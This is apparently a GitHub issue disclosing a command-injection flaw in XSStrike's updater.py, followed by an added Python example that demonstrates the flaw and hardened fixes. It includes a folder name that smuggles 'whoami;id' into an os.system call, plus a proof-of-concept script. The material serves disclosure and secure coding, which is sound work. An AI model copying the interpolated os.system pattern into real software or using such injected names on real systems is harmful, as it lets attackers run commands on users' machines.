
Vulnerability - Executing commands with unsanitized folder name

randsec opened this issue · Open · 0 comments

Impact

What kind of vulnerability is it? Command execution over an unsanitized folder name.

Vulnerable file

XSStrike/core/updater.py

Vulnerable code

Lines 33-34:

os.system('git clone --quiet https://github.com/s0md3v/XSStrike %s' % (folder))

The folder variable is taken from the current directory. Lines 26-27:

currentPath = os.getcwd().split('/')
folder = currentPath[-1]

If the user creates a folder with a Linux command in its name, the command will be executed.

POC

Create a folder with a command injection in its name: mkdir "command_injection;whoami;id"

Call os.system: os.system( 'git clone --quiet https://github.com/s0md3v/XSStrike %s' % (folder))

The system will clone the repo and then execute the commands: whoami; id

Below I wrote a POC. It's the same os.system call but modified to list the folder's contents instead of cloning a repo. This doesn't affect exploitability.

import os

# Same as updater.py lines 26-27: the last component of the working directory
# becomes the (untrusted) folder name.
currentPath = os.getcwd().split('/')
folder = currentPath[-1]

print("[i] Current folder name: {}".format(folder))
print("[!] I'm going to call the os.system command!...")
# Same pattern as updater.py lines 33-34, with 'ls' standing in for 'git clone':
# the folder name is interpolated into a shell command string, so a name such as
# "command_injection;whoami;id" runs whoami and id after ls.
os.system('ls %s' % (folder))

randsec, Mar 18 '20 20:03
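The following is an added example, not code from the issue or from the XSStrike/Pentest-Tools-Framework projects. It reproduces the injection pattern the report describes (untrusted folder name interpolated into a string run through the shell) with `echo` standing in for `git clone`, so it runs offline, and places it beside two hardened forms: passing argv as a list with no shell, and quoting the untrusted part with `shlex.quote` when a shell string is unavoidable. The folder names are constructed for the demo; `run_from_cwd()` is a hypothetical helper that shows the real vector by creating the malicious directory in a temp dir and reading its name back from `os.getcwd()` exactly as updater.py does.

```python
import os
import shlex
import subprocess
import tempfile

# Constructed sample folder names for the demo (not real directories on disk).
BENIGN_FOLDER = "XSStrike"
MALICIOUS_FOLDER = "command_injection;echo INJECTED"


def folder_name_from_cwd():
    """Mirror updater.py lines 26-27: last path component of the working directory."""
    return os.getcwd().split("/")[-1]


def vulnerable_command(folder):
    """String interpolation as in updater.py lines 33-34; 'echo' stands in for git clone."""
    return "echo cloning into %s" % (folder)


def run_vulnerable(folder):
    """os.system-style execution: the string goes through /bin/sh, so ';' splits commands.

    Returns the lines the shell printed; an injected command shows up as an extra line.
    """
    proc = subprocess.run(vulnerable_command(folder), shell=True,
                          capture_output=True, text=True)
    return proc.stdout.splitlines()


def run_hardened(folder):
    """Hardened form: argv list, no shell. The folder name is one opaque argument."""
    proc = subprocess.run(["echo", "cloning into", folder],
                          capture_output=True, text=True)
    return proc.stdout.splitlines()


def quoted_command(folder):
    """If a shell string is unavoidable, shell-quote the untrusted part."""
    return "echo cloning into %s" % shlex.quote(folder)


def run_quoted(folder):
    """Same shell execution as the vulnerable path, but with the quoted command."""
    proc = subprocess.run(quoted_command(folder), shell=True,
                          capture_output=True, text=True)
    return proc.stdout.splitlines()


def run_from_cwd(folder):
    """Hypothetical helper: create `folder` under a temp dir, chdir into it, and run the
    vulnerable and hardened paths with the name read back from os.getcwd(), as the
    real updater would. Returns (vulnerable_lines, hardened_lines)."""
    original = os.getcwd()
    with tempfile.TemporaryDirectory() as tmp:
        target = os.path.join(tmp, folder)
        os.mkdir(target)
        os.chdir(target)
        try:
            name = folder_name_from_cwd()
            return run_vulnerable(name), run_hardened(name)
        finally:
            os.chdir(original)


if __name__ == "__main__":
    vuln, safe = run_from_cwd(MALICIOUS_FOLDER)
    print("[vulnerable] shell output:", vuln)   # extra 'INJECTED' line
    print("[hardened]   argv output: ", safe)   # folder name passed through verbatim
    print("[quoted]     shell output:", run_quoted(MALICIOUS_FOLDER))
```

The argv-list form is the one to prefer: it removes the shell from the path entirely, so there is nothing to quote and no metacharacter list to keep up to date. `shlex.quote` is the fallback when the command really must be a single shell string (for example when it is built for `os.system`), and it only protects POSIX shells.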